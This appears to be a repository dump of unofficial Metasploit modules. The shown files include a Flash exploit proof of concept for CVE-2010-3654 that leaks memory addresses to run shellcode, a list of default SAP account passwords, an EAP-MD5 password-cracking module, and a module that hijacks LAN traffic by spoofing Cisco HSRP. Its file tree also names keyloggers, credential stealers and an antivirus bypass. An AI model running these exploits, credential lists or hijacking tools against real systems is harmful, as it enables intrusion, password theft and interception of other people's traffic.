├── .gitignore ├── Gemfile.local ├── README.md ├── data ├── Kblist.txt ├── dns_mitm.txt ├── source │ └── exploits │ │ └── CVE-2010-3654 │ │ ├── Download.as │ │ ├── Original_Class.as │ │ ├── Real_Ref_Class.as │ │ └── main.as └── wordlists │ ├── http_default_devices.csv │ ├── http_default_fingerprints.csv │ ├── http_default_settings.csv │ ├── sap_common.txt │ ├── sap_default.txt │ └── sipproxy_replace.txt ├── lib ├── msf │ └── core │ │ ├── auxiliary │ │ ├── mixins.rb │ │ └── sip.rb │ │ └── exploit │ │ ├── powershell.rb │ │ └── sap.rb └── rex │ ├── exploitation │ └── powershell.rb │ └── proto │ ├── sip.rb │ └── sip │ └── socket.rb ├── modules ├── auxiliary │ ├── bruteforce │ │ └── eap_md5_dict.rb │ ├── capture │ │ ├── hsrp.rb │ │ └── mdns_collector.rb │ ├── gather │ │ ├── netcrafting.rb │ │ └── ripecon.rb │ ├── hp │ │ ├── hp_laserjet_download.rb │ │ ├── hp_laserjet_enum_fs.rb │ │ ├── hp_laserjet_ready_msg.rb │ │ ├── hp_laserjet_scanner.rb │ │ └── snmp_enum_hp_laserjet.rb │ ├── http │ │ └── vhost_finder.rb │ ├── scanner │ │ ├── http │ │ │ └── fingerprint.rb │ │ ├── sap │ │ │ ├── sap_rfc_brute_login.rb │ │ │ ├── sap_rfc_client_enum.rb │ │ │ ├── sap_rfc_dbmcli_sxpg_command_exec.rb │ │ │ ├── sap_rfc_python_sxpg_command_exec.rb │ │ │ ├── sap_rfc_read_table.rb │ │ │ ├── sap_rfc_sxpg_call_system.rb │ │ │ ├── sap_rfc_sxpg_command_exec.rb │ │ │ ├── sap_rfc_system.rb │ │ │ └── sap_rfc_usr02.rb │ │ └── sip │ │ │ ├── vsipbruteforce.rb │ │ │ ├── vsipenumerator.rb │ │ │ ├── vsipinvite.rb │ │ │ ├── vsipoptions.rb │ │ │ ├── vsipproxy.rb │ │ │ ├── vsipregister.rb │ │ │ └── vsiptrust.rb │ ├── securestate │ │ ├── cdp.rb │ │ ├── owa_login.rb │ │ └── proxy_config.rb │ ├── sqli │ │ └── oracle_erp_sqli1.rb │ └── unstable │ │ ├── boa_auth_dos.rb │ │ ├── cisco_vpn_groupname_enum.rb │ │ ├── d20tftpbd.rb │ │ ├── dns_mitm.rb │ │ ├── dtp.rb │ │ ├── duckduck_password.rb │ │ ├── eap_md5_dict.rb │ │ ├── enum_bing_url.rb │ │ ├── hsrp_hijack.rb │ │ ├── http_javascript_cookielogger.rb │ │ ├── 
http_server.rb │ │ ├── http_transparent_injection_proxy.rb │ │ ├── ip_geolocate.rb │ │ ├── javascript_keylogger.rb │ │ ├── joomla_filter_order_aux.rb │ │ ├── local_admin_pwnage_scanner.rb │ │ ├── ms11_082.rb │ │ ├── msftidyscan.rb │ │ ├── oracle_erp_sqli1.rb │ │ ├── pvstp.rb │ │ ├── smallftpd_dos.rb │ │ ├── smb_enumshares_rw.rb │ │ ├── spoonftp_retr.rb │ │ ├── stp.rb │ │ ├── strawman_post_dos.rb │ │ ├── syslog_spoof_custom_message.rb │ │ ├── syslog_spoof_log_file.rb │ │ ├── ttlexpiry.rb │ │ └── typsoft11_retr.rb ├── exploits │ ├── multi │ │ └── sap │ │ │ ├── sap_rfc_abap_install_and_run.rb │ │ │ ├── sap_rfc_sxpg_call_system.rb │ │ │ └── sap_rfc_sxpg_command_exec.rb │ ├── netspi │ │ └── ps_webshells.rb │ ├── securestate │ │ └── liferay_xsl.rb │ ├── unstable │ │ ├── incomplete │ │ │ ├── linux │ │ │ │ └── ids │ │ │ │ │ └── snortdcerpc.rb │ │ │ ├── multi │ │ │ │ ├── browser │ │ │ │ │ └── firefox_dom_insertion.rb │ │ │ │ └── http │ │ │ │ │ ├── jboss_seam_remote_command.rb │ │ │ │ │ └── jcow_eval.rb │ │ │ ├── telnet_encrypt_keyid_bruteforce.rb │ │ │ ├── unix │ │ │ │ └── samba │ │ │ │ │ └── sid_parse_jjd.rb │ │ │ └── windows │ │ │ │ ├── browser │ │ │ │ ├── adobe_embedded_com_firefox.rb │ │ │ │ ├── aol_linksbicons.rb │ │ │ │ ├── firefox_unicode.rb │ │ │ │ ├── kingview_validateuser.rb │ │ │ │ ├── ms09_054_deflate.rb │ │ │ │ ├── ms10_018_ie_uninit.rb │ │ │ │ ├── opera_content_length.rb │ │ │ │ ├── opera_svg.rb │ │ │ │ ├── oracle_autovue.rb │ │ │ │ ├── safari_feedurl.rb │ │ │ │ └── safari_float.rb │ │ │ │ ├── dameware_username_bof.rb │ │ │ │ ├── fileformat │ │ │ │ ├── adobe_flashplayer_flash10o.rb │ │ │ │ ├── mplayer_lite_m3u.rb │ │ │ │ ├── ms04_034_zip_folders.rb │ │ │ │ └── ms10_055_cinepak_codec.rb │ │ │ │ ├── ftp │ │ │ │ └── knftp.rb │ │ │ │ ├── http │ │ │ │ ├── hp_nnm_rptconfig_2704.rb │ │ │ │ ├── oracle_autovue.rb │ │ │ │ └── uplusftp_get_bof.rb │ │ │ │ ├── ldap │ │ │ │ └── ibm_tivoli_ibmslapd.rb │ │ │ │ ├── misc │ │ │ │ ├── edirectory_dhost_module.rb │ │ │ │ ├── 
hp_data_protector_exec_setup.rb │ │ │ │ └── hp_dataprotector_cmdexec.rb │ │ │ │ ├── scada │ │ │ │ └── issymbol_openscreen.rb │ │ │ │ ├── smb │ │ │ │ ├── ms09_050_smb2.rb │ │ │ │ └── ms09_064_llssrv.rb │ │ │ │ └── tftp │ │ │ │ ├── hp_imc_err.rb │ │ │ │ └── hp_imc_wrq.rb │ │ ├── unreliable │ │ │ └── windows │ │ │ │ ├── browser │ │ │ │ ├── ms10_081_comctl32_svg.rb │ │ │ │ └── webkit_styleelement_process.rb │ │ │ │ ├── fileformat │ │ │ │ ├── foxit_pdf_action_bof.rb │ │ │ │ └── ms10_087_rtf_pfragments_bof.rb │ │ │ │ ├── ftp │ │ │ │ ├── actfax_user_ftp.rb │ │ │ │ └── solarftp_pasv.rb │ │ │ │ ├── misc │ │ │ │ └── dameware_mrc4.rb │ │ │ │ └── scada │ │ │ │ └── cognet_datahub_bof.rb │ │ └── untested │ │ │ ├── arachni_exec.rb │ │ │ ├── arachni_path_traversal.rb │ │ │ ├── arachni_php_eval.rb │ │ │ ├── arachni_php_include.rb │ │ │ ├── arachni_sqlmap.rb │ │ │ ├── cisco_acs_ucp.rb │ │ │ ├── lotus_cookiefile.rb │ │ │ └── yahoo_player_m3u.rb │ └── windows │ │ ├── browser │ │ └── ie_unsafe_scripting.rb │ │ ├── dcerpc │ │ └── wmis_psh.rb │ │ ├── http │ │ └── oracle_endeca_exec.rb │ │ ├── local │ │ ├── current_user_psexec.rb │ │ ├── ms13_005_hwnd_broadcast.rb │ │ └── wmi.rb │ │ ├── misc │ │ └── psh_web_delivery.rb │ │ └── smb │ │ └── psexec_psh.rb └── post │ ├── linux │ └── q │ │ ├── passwd-shadow-ssh-jacker-meterpreter.rb │ │ └── passwd-shadow-ssh-jacker-shell.rb │ ├── unstable │ ├── enum_lsa.rb │ ├── enum_users.rb │ ├── exec_powershell.rb │ ├── keepass_jacker.rb │ ├── kill_by_name.rb │ ├── killmcafee.rb │ ├── openvpn_profiles_jack.rb │ └── unpriv_wmic.rb │ └── windows │ └── q │ ├── keepass_jacker.rb │ ├── openvpn_profiles_jack.rb │ ├── stickynotes-jacker.rb │ ├── unpriv_wmic.rb │ └── winlocalprv_esc.rb ├── plugins └── unstable │ └── arachni.rb └── scripts ├── cache_bomb.rb ├── getdomains.rb ├── getsessions.rb ├── ie_hashgrab.rb ├── listdrives.rb ├── loggedon.rb ├── runon_netview.rb ├── search_hash_creds.rc └── virusscan_bypass8_8.rb /.gitignore: 
-------------------------------------------------------------------------------- 1 | *.gem 2 | *.rbc 3 | .bundle 4 | .config 5 | coverage 6 | InstalledFiles 7 | lib/bundler/man 8 | pkg 9 | rdoc 10 | spec/reports 11 | test/tmp 12 | test/version_tmp 13 | tmp 14 | 15 | # YARD artifacts 16 | .yardoc 17 | _yardoc 18 | doc/ 19 | -------------------------------------------------------------------------------- /Gemfile.local: -------------------------------------------------------------------------------- 1 | group :sap do 2 | gem 'nwrfc', '>= 0.0.6' 3 | end 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | q - Readme 2 | == 3 | 4 | Collection of Modules gathered across time and internets 5 | ==== 6 | 7 | Basically this will be a repository of modules that have been found 8 | on the internets across the time that for one reason or another 9 | would not be accepted to the trunk. 10 | 11 | This pack is free (public github and all..) and released without 12 | warranty or license. 13 | 14 | Modules can be put here until they are ready to be submitted to MSF as a 15 | pull request, or if the author wants to license their module in a certain 16 | way that prevents it from being in trunk, all are welcome here. 17 | 18 | Something not working? 19 | === 20 | If you can code, submit a pull request, if you can't just descibe the issue 21 | to the best of your ability in a new "issue", or email me (mubix[at]hak5.org) 22 | if you don't want to have to create a Github account. 
23 | 24 | Other available Metasploit modules/scripts/plugins: 25 | === 26 | 27 | MetaSSH - SSH session type with routing and more 28 | -=> https://github.com/dirtyfilthy/metassh 29 | 30 | MSFmap - Post-exploitation scanning plugin 31 | -=> http://code.google.com/p/msfmap/ -------------------------------------------------------------------------------- /data/dns_mitm.txt: -------------------------------------------------------------------------------- 1 | 192.168.0.2 google.com 2 | -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/Download.as: -------------------------------------------------------------------------------- 1 | package poc { 2 | 3 | import flash.display.*; 4 | import flash.events.*; 5 | import flash.net.*; 6 | 7 | public class Download extends Sprite 8 | { 9 | 10 | public var myLoader:URLLoader = new URLLoader(); 11 | public var buf:String = new String(); 12 | 13 | public function init():void 14 | { 15 | var urlRequest:URLRequest = new URLRequest("test.bin"); 16 | myLoader.dataFormat = URLLoaderDataFormat.BINARY; 17 | myLoader.addEventListener(Event.COMPLETE, onComplete); 18 | myLoader.load(urlRequest); 19 | } 20 | 21 | 22 | public function onComplete(e:Event):void 23 | { 24 | buf = myLoader.data; 25 | dispatchEvent(new Event(Event.COMPLETE)); 26 | } 27 | 28 | public function getBinary():String { 29 | return buf; 30 | } 31 | 32 | } 33 | } -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/Original_Class.as: -------------------------------------------------------------------------------- 1 | package poc { 2 | public class Original_Class 3 | { 4 | public static function static_func1(leak:uint,imageBase:uint):Original_Class 5 | { 6 | return null; 7 | } 8 | 9 | public static function ROPPayload(imageBase:uint, leak2:uint):uint 10 | { 11 | return 1; 12 | } 13 | 14 | public function normal_func():uint 15 | { 16 | return 0; 17 
| } 18 | 19 | public static function strToInt(param_in:String) 20 | { 21 | } 22 | 23 | public static function shellcode():uint 24 | { 25 | return 1; 26 | } 27 | } 28 | 29 | } -------------------------------------------------------------------------------- /data/source/exploits/CVE-2010-3654/main.as: -------------------------------------------------------------------------------- 1 | // compile >mxmlc -source-path=c:\ C:\poc\main.as 2 | // decompress using SWF_Compressor 3 | // change 07 01 02 07 |01| 03 07 02 05 -> 07 01 02 07 01 |02| 07 02 05 4 | // Shahin [at] abysssec.com 5 | // twitter: @abysssec 6 | 7 | package poc 8 | { 9 | 10 | import flash.utils.*; 11 | import flash.display.*; 12 | import flash.text.*; 13 | import flash.external.* 14 | import flash.events.*; 15 | 16 | public class main extends Sprite 17 | { 18 | 19 | public var d:Download = new Download(); 20 | 21 | function get get_test1():Real_Ref_Class 22 | { 23 | return null; 24 | } 25 | 26 | public function main() 27 | { 28 | d.addEventListener(Event.COMPLETE, onLoad); 29 | d.init(); 30 | } 31 | 32 | public function onLoad(e:Event):void { 33 | var payload:String = d.getBinary(); 34 | Real_Ref_Class.setShellcode(payload); 35 | sploit(); 36 | } 37 | 38 | public function sploit() 39 | { 40 | /////////////////////// LEAK IMAGE BASE //////////////////////////// 41 | 42 | var objshellcode:uint = Original_Class.shellcode(); 43 | var p_objshellcode:uint = objshellcode & 0xFFFFFFF8; 44 | 45 | var str_objshellcode:String = p_objshellcode.toString(); 46 | var int_str_objshellcode = Original_Class.strToInt(str_objshellcode); 47 | 48 | var z:Number = new Number(int_str_objshellcode); 49 | var b:ByteArray = new ByteArray(); 50 | b.writeDouble(z); 51 | var res:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 52 | 53 | var imageBase:uint = res - 0X004E2F58; 54 | 55 | 56 | /////////////////// LEAK SHELLCODE STRING ADDRESS ///////////////// 57 | 58 | var temp:uint = p_objshellcode + 0x8; 59 | 60 | str = 
temp.toString(); 61 | istr = Original_Class.strToInt(str); 62 | 63 | z = new Number(istr); 64 | 65 | b = new ByteArray(); 66 | b.writeDouble(z); 67 | var SHELLCODELeak = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 68 | 69 | 70 | ///////////////////// LEAK ROPPayload ADDRESS ///////////////// 71 | 72 | var objROPPayload:uint = Original_Class.ROPPayload(imageBase,SHELLCODELeak); 73 | var temp2:uint = objROPPayload & 0xFFFFFFF8; 74 | var str:String = temp2.toString(); 75 | var istr = Original_Class.strToInt(str); 76 | 77 | temp = temp2 + 0x8; 78 | 79 | str = temp.toString(); 80 | istr = Original_Class.strToInt(str); 81 | 82 | z = new Number(istr); 83 | 84 | b = new ByteArray(); 85 | b.writeDouble(z); 86 | var ROPPayloadLeak:uint = b[4]*0x1000000 + b[5]*0x10000 + b[6]*0x100 + b[7]; 87 | 88 | var obj:Original_Class = Original_Class.static_func1(ROPPayloadLeak, imageBase); 89 | obj.normal_func(); 90 | } 91 | } 92 | 93 | } -------------------------------------------------------------------------------- /data/wordlists/sap_common.txt: -------------------------------------------------------------------------------- 1 | sapservice 2 | sapadm 3 | adm 4 | sqd 5 | sapdb 6 | 7 | sapservice 8 | sapr3 9 | sapsr3 10 | ora 11 | -------------------------------------------------------------------------------- /data/wordlists/sap_default.txt: -------------------------------------------------------------------------------- 1 | SAP* 06071992 2 | SAP* PASS 3 | DDIC 19920706 4 | DDIC Welcome01 5 | SAPCPIC ADMIN 6 | EARLYWATCH SUPPORT 7 | TMSADM PASSWORD 8 | TMSADM ADMIN 9 | TMSADM $1Pawd2& 10 | ADMIN welcome 11 | ADSUSER ch4ngeme 12 | ADS_AGENT ch4ngeme 13 | DEVELOPER ch4ngeme 14 | J2EE_ADMIN ch4ngeme 15 | SAPJSF ch4ngeme 16 | SAPR3 SAP 17 | CTB_ADMIN sap123 18 | XMI_DEMO sap123 19 | 20 | -------------------------------------------------------------------------------- /data/wordlists/sipproxy_replace.txt: 
-------------------------------------------------------------------------------- 1 | #Seperation Char is \t (tab) 2 | #Regular Expressions Allowed 3 | #Source Replacement_Samples 4 | #regexp test content 124 5 | #1001 12**023 6 | #\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b 192.168.1.500 7 | -------------------------------------------------------------------------------- /lib/msf/core/auxiliary/mixins.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | 3 | # 4 | # Auxiliary mixins 5 | # 6 | require 'msf/core/auxiliary/auth_brute' 7 | require 'msf/core/auxiliary/dos' 8 | require 'msf/core/auxiliary/fuzzer' 9 | require 'msf/core/auxiliary/report' 10 | require 'msf/core/auxiliary/scanner' 11 | require 'msf/core/auxiliary/udp_scanner' 12 | require 'msf/core/auxiliary/timed' 13 | require 'msf/core/auxiliary/wmapmodule' 14 | require 'msf/core/auxiliary/web' 15 | require 'msf/core/auxiliary/crawler' 16 | 17 | require 'msf/core/auxiliary/commandshell' 18 | require 'msf/core/auxiliary/login' 19 | require 'msf/core/auxiliary/rservices' 20 | require 'msf/core/auxiliary/cisco' 21 | require 'msf/core/auxiliary/nmap' 22 | require 'msf/core/auxiliary/jtr' 23 | require 'msf/core/auxiliary/iax2' 24 | require 'msf/core/auxiliary/pii' 25 | require 'msf/core/auxiliary/sip' 26 | -------------------------------------------------------------------------------- /lib/rex/proto/sip.rb: -------------------------------------------------------------------------------- 1 | # -*- coding: binary -*- 2 | #Viproy SIP Library 3 | #Author : Fatih Ozavci - gamasec.net/fozavci 4 | #Github : github.com/fozavci/viproy-voipkit 5 | 6 | require 'rex/proto/sip/socket' 7 | -------------------------------------------------------------------------------- /modules/auxiliary/bruteforce/eap_md5_dict.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # $Id: $ 3 | ## 4 | 5 | ## 6 | # This file is part of the 
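# Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'packetfu'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Capture
  include Msf::Auxiliary::Report

  # Offset of the EAP header in an Ethernet frame: 14 byte MAC header,
  # 4 byte EAPOL header, EAP at 18.
  EAP_OFFSET_802_3  = 18
  # Offset of the EAP header in an 802.11 data frame as this module expects
  # it: 24 byte MAC header + 8 byte LLC/SNAP (ethertype at 30), EAPOL at 32,
  # EAP at 36. A QoS/HT header or a radiotap pseudo-header shifts all of
  # these -- TODO confirm against captures from the target environment.
  EAP_OFFSET_802_11 = 36

  def initialize
    super(
      'Name'        => 'EAP-MD5 challenge dictionary attack.',
      'Description' => %q{
        This module launch a dictionary attack against an EAP-MD5 challenge.
        The PCAP should contains at least the following requests:
        EAP reponse, identity (contains the username)
        EAP request, MD5-challenge
        EAP response, MD5-challenge
        EAP success (the module validate the authentication was succesful)

        Compatible with wired and 802.11 - 802.1x environments.
      },
      'Author'      =>
        [
          'pello '
        ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: $'
    )

    # Record whether pcaprub loads so a missing dependency surfaces as a
    # module error rather than a LoadError from deep inside PacketFu.
    begin
      require 'pcaprub'
      @@havepcap = true
    rescue ::LoadError
      @@havepcap = false
    end

    register_options(
      [
        OptString.new('WORDLIST', [ true, "Wordlist file for challenge bruteforce.", ''])
      ], self.class)

    # Offline attack: only PCAPFILE (from the Capture mixin) and WORDLIST matter.
    deregister_options('RHOST','NETMASK','TIMEOUT','FILTER','SNAPLEN','INTERFACE')

  end

  # Walks PCAPFILE and collects the pieces of one EAP-MD5 exchange.
  #
  # Returns a Hash holding, when found:
  #   'user'   - identity string from the EAP Response/Identity
  #   'id'     - EAP identifier (Integer) of the MD5-Challenge response
  #   'req'    - challenge bytes from the EAP Request/MD5-Challenge
  #   'resp'   - 16 digest bytes from the EAP Response/MD5-Challenge
  #   'status' - true once an EAP Success (code 3) has been seen
  #
  # Frames that are too short or otherwise unparsable are skipped; the walk
  # stops as soon as all five pieces are present.
  def find_eap_challenge
    eapinfo = Hash.new
    cap = PacketFu::PcapFile.new.f2a(:filename => datastore['PCAPFILE'])
    cap.each do |pkt|
      begin
        # EAPOL ethertype 0x888e sits after the LLC/SNAP header on 802.11
        # and directly after the MAC header on 802.3.
        if pkt[30, 2] && pkt[30, 2].unpack('H4').join == "888e"
          parse_eap(pkt, EAP_OFFSET_802_11, eapinfo)
        elsif pkt[12, 2] && pkt[12, 2].unpack('H4').join == "888e"
          parse_eap(pkt, EAP_OFFSET_802_3, eapinfo)
        else
          next
        end
        # The original tested an undefined `data` here, which raised and was
        # swallowed by the bare rescue, so the early exit never happened.
        break if eapinfo.size == 5
      rescue ::StandardError => e
        vprint_error("Skipping unparsable frame: #{e.class}: #{e.message}")
        next
      end
    end
    eapinfo
  end

  # Decodes the EAP packet that starts at byte +off+ of +pkt+ into +info+.
  #
  # EAP header (RFC 3748 4.1): code(1) id(1) length(2) type(1) type-data.
  # MD5-Challenge (type 4) type-data is value-size(1) followed by the value;
  # Identity (type 1) type-data is the bare identity string, with no length
  # byte, so it runs to the end of the EAP packet.
  #
  # String#[] returned a Fixnum on Ruby 1.8 and a one-character String on
  # 1.9+; .ord yields the byte value on both, whereas the original .to_i
  # always gave 0 on 1.9+.
  def parse_eap(pkt, off, info)
    code    = pkt[off].ord
    ident   = pkt[off + 1].ord
    eap_len = pkt[off + 2, 2].unpack('n')[0]
    type    = pkt[off + 4].ord

    if code == 2 && type == 4            # Response/MD5-Challenge
      vsize = pkt[off + 5].ord
      info['resp'] = pkt[off + 6, vsize]
      info['id']   = ident
    elsif code == 1 && type == 4         # Request/MD5-Challenge
      vsize = pkt[off + 5].ord
      info['req'] = pkt[off + 6, vsize]
    elsif code == 2 && type == 1         # Response/Identity
      info['user'] = pkt[off + 5, eap_len - 5]
    elsif code == 3                      # Success
      info['status'] = true
    end
  end

  # Tries every line of WORDLIST as the password for the captured exchange.
  #
  # EAP-MD5 (RFC 3748 5.4) defines the response value as
  # MD5(identifier || password || challenge); a match against the captured
  # response proves the password. The original hashed a constant identifier
  # of 2 instead of the one taken from the capture.
  #
  # reqchallenge  - challenge bytes from the Request/MD5-Challenge
  # respchallenge - raw digest bytes from the Response/MD5-Challenge
  # id            - EAP identifier of the response (Integer or 1-byte String)
  # user          - identity, used only for reporting
  def compare_challenge_and_passwords(reqchallenge, respchallenge, id, user)
    correctpass = nil
    # Integer#ord is the identity and String#ord the first byte, so either
    # representation of the identifier works.
    id_byte  = id.ord.chr
    expected = respchallenge.unpack('H*')[0]
    print_status("Passwords loaded from #{datastore['WORDLIST']}")
    # foreach closes the wordlist; the original File.open handle was never closed.
    ::File.foreach(datastore['WORDLIST']) do |p|
      # chomp (not rstrip) so candidates ending in spaces are still tried
      candidate = p.chomp
      if Rex::Text.md5(id_byte + candidate + reqchallenge) == expected
        correctpass = candidate
        break
      end
    end
    if correctpass.nil?
      print_error("Password not found.")
    else
      print_good("The login/password is: #{user}/#{correctpass}")
      report_note(
        :type => 'EAP-MD5',
        :user => user,
        :pass => correctpass)
    end

  end

  # Entry point: extract the exchange from the capture, make sure it is a
  # complete and successful one, then run the dictionary against it.
  def run

    print_status("Looking for EAP-MD5 challenge in #{datastore['PCAPFILE']}")

    eap = find_eap_challenge
    # `defined? eap['req']` describes the method call and is always truthy,
    # so the original condition could never fire; test the values instead.
    if eap['req'].nil? || eap['resp'].nil?
      print_error("There is no EAP-MD5 challenge in the PCAP file")
    elsif !eap['status']
      print_error("There is no succesful EAP-MD5 challenge in the PCAP file")
    else
      compare_challenge_and_passwords(eap['req'], eap['resp'], eap['id'], eap['user'])
    end

  end


end
--------------------------------------------------------------------------------
/modules/auxiliary/capture/hsrp.rb:
--------------------------------------------------------------------------------
##
# $Id: $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'
require 'racket'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Capture

  def initialize
    super(
      'Name'        => 'Cisco HSRP traffic hijacking.',
      'Description' => %q{
        This module will direct LAN traffic to the attacker host if HSRP is present.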
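      },
      'Author'      => [ 'pello' ],
      'License'     => MSF_LICENSE,
      'Version'     => '$Revision: $'
    )
    register_options(
      [
        Opt::RPORT(1985),
        OptString.new('INTERFACE', [true, "The name of the interface", 'eth0'])
      ], self.class)

    # Live capture only; the offline options from the Capture mixin do not apply.
    deregister_options('PCAPFILE','SNAPLEN','FILTER')

    begin
      require 'pcaprub'
      @@havepcap = true
    rescue ::LoadError
      @@havepcap = false
    end
  end

  # Sniffs INTERFACE for one HSRP hello (224.0.0.2, UDP/1985) for up to
  # 3 seconds and copies its group number, virtual IP and authentication
  # string into @hsrp_group / @hsrp_vip / @hsrp_password.
  #
  # Returns true when a hello was seen, false (or nil) otherwise.
  def hsrp_listen
    # open_live(iface, snaplen, promisc, to_ms) -- the last argument is the
    # read timeout that lets a blocking libpcap read return, presumably what
    # makes the Timeout below effective at all; confirm on the target platform.
    pcap = Pcap::open_live(datastore['INTERFACE'], 1500, false, 3)
    pcap.setfilter("host 224.0.0.2 and udp port 1985")
    begin
      print_status("Sniffing traffic.....")
      Timeout.timeout(3) do
        pcap.each do |pkt|
          eth  = Racket::L2::Ethernet.new(pkt)
          ip   = Racket::L3::IPv4.new(eth.payload)
          udp  = Racket::L4::UDP.new(ip.payload)
          hsrp = Racket::L5::HSRP.new(udp.payload)
          @hsrp_group    = hsrp.group
          @hsrp_vip      = hsrp.vip
          @hsrp_password = hsrp.password
          return true
        end
      end
    rescue Timeout::Error
      return false
    ensure
      # The original never released the capture handle.
      pcap.close if pcap.respond_to?(:close)
    end

  end

  # Entry point: learn the active HSRP group from a sniffed hello, then keep
  # sending hellos claiming the Active state with priority 254 every 3 seconds
  # so the group's virtual IP fails over to this host.
  #
  # The spoofed hellos reuse the authentication string recovered from the
  # sniffed packet (HSRPv1 carries it in clear text) and are sourced from
  # RHOST, which has to be an address of ours on that segment. The send loop
  # only ends when the module is interrupted.
  def run

    raise "Pcaprub is not available" if not @@havepcap
    # Racket cannot build the IPv4 header without a source address.
    raise "RHOST must be set to this host's IP on the HSRP segment" if datastore['RHOST'].to_s.empty?

    @run = false
    @hsrp_group = 1
    @hsrp_priority = 254
    @hsrp_vip = ""
    @hsrp_password = "cisco"

    if hsrp_listen
      print_status("Vip: #{@hsrp_vip} Group: #{@hsrp_group} Password: #{@hsrp_password}")
      print_good("Start traffic hijacking.....")
    else
      print_error("No HSRP traffic.")
      return false
    end

    @run = true

    n = Racket::Racket.new
    n.l2 = Racket::L2::Ethernet.new
    n.l2.ethertype = 0x0800
    n.l2.dst_mac = "01:00:5e:00:00:02"   # all-routers multicast group MAC
    n.l3 = Racket::L3::IPv4.new
    n.l3.src_ip = datastore['RHOST']
    n.l3.dst_ip = "224.0.0.2"
    n.l3.protocol = 0x11                  # UDP
    n.l4 = Racket::L4::UDP.new
    n.l4.src_port = 1985
    n.l4.dst_port = 1985
    n.l5 = Racket::L5::HSRP.new
    n.l5.group = @hsrp_group
    n.l5.priority = @hsrp_priority
    n.l5.password = @hsrp_password
    n.l5.opcode = 0                       # Hello
    n.l5.state = 16                       # Active
    n.l5.vip = @hsrp_vip

    # Attach the HSRP layer only while computing the UDP checksum; pack()
    # presumably serialises l5 itself, so l4's payload is cleared afterwards
    # to avoid sending it twice.
    n.l4.payload = n.l5
    n.l4.fix!(n.l3.src_ip, n.l3.dst_ip)
    n.l4.payload = ""

    n.iface = datastore['INTERFACE']
    n.pack()
    while @run
      n.send2()
      select(nil, nil, nil, 3)
    end

  end

end
--------------------------------------------------------------------------------
/modules/auxiliary/gather/netcrafting.rb:
--------------------------------------------------------------------------------
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'NetcRafting - a Netcraft domain Query Tool',
      'Version'     => '$Revision$',
      'Description' => %q{
        This module identify domain that contain a given keyword using Netcraft
        search domain functionality. Please agree with terms and conditions prior
        using this module (http://news.netcraft.com/fair-use-copyright).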
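      },

      'Author'      =>
        [
          'Cristiano Maruti '
        ],

      'References'  =>
        [
          # was 'http://http://searchdns.netcraft.com' -- doubled scheme
          ['URL', 'http://searchdns.netcraft.com']
        ],

      'License'     => MSF_LICENSE
    )

    register_options([
      # The default IP is a snapshot of where searchdns resolved when the
      # module was written and may well be stale -- VHOST is what matters.
      OptString.new('RHOST', [true, 'The IP address of Netcraft searchdns server', '194.72.238.150']),
      OptString.new('VHOST', [true, 'The host name runnning Netcraft searchdns tool', 'searchdns.netcraft.com']),
      OptString.new('OUTFILE', [false, "A filename to store the results of the module"]),
      OptString.new('KEYWORD', [true, 'Keyword you want to search for (ex. Microsoft, Google)']),
    ], self.class)

  end

  # Base URL of the Netcraft searchdns front end (plain HTTP on port 80).
  def netcraft_url
    "http://#{datastore['VHOST']}:80"
  end

  # Writes +data+ to OUTFILE. The path is operator supplied and used as-is.
  def save_output(data)
    # Block form guarantees the handle is closed even if write raises.
    ::File.open(datastore['OUTFILE'], "wb") { |f| f.write(data) }
    print_status("Save results in #{datastore['OUTFILE']}")
  end

  # Searches Netcraft for sites whose name contains +keyword+, follows the
  # "Next page" links, prints a Site/Netblock/OS table and saves it to
  # OUTFILE when that option is set.
  #
  # This is screen scraping of the searchdns HTML as it looked when the
  # module was written; if the markup changes the regexes simply match
  # nothing and the table stays empty.
  def do_search_netcraft(keyword)

    payload = "#{netcraft_url}?restriction=site+contains&host=*#{Rex::Text.uri_encode(keyword)}*"
    # KEYWORD is interpolated into a regex below; escape it so regex
    # metacharacters in the keyword cannot alter (or blow up) the match.
    kw_re = Regexp.escape(keyword)
    seen  = {}

    # Save the results to this table
    tbl = Rex::Ui::Text::Table.new(
      'Header'  => 'Query Results',
      'Indent'  => 1,
      'Columns' => ['Site', 'Netblock', 'OS'],
    )

    loop do
      # Stop if the "next" link does not advance; the original looped forever
      # in that case because the loop condition only looked for "Next page".
      break if seen[payload]
      seen[payload] = true

      res = send_request_raw({
        'method' => 'GET',
        'uri'    => payload
      }, 20)

      if res.nil?
        # The original evaluated res.body in the loop condition and crashed here.
        print_error("Failed to connect to #{netcraft_url}")
        break
      end

      begin
        res.body.scan(/\/site_report\?url=http:\/\/(.+)"><\/a><\/td>\n.+<\/td>\n.+\/netblock\?q=[a-z0-9\-\.,]+">(.*)<\/a><\/td>\n.+\/up\/graph\/\?host=.+">(.*)<\/a>/i) do |m|
          tbl << ["#{m[0]}", "#{m[1]}", "#{m[2]}"]
        end

        next_link = res.body.scan(/\/\?host=\*#{kw_re}\*&.*&position=/i)[0]
        payload = netcraft_url + next_link unless next_link.nil?

      rescue ::StandardError => e
        # rescue Exception (the original) would also have swallowed interrupts.
        print_error("Error retrieving details in the page body")
        vprint_line(e.message)
      end

      break if res.body.scan(/Next page<\/b>/i)[0].nil?
    end

    #Show data and maybe save it if needed
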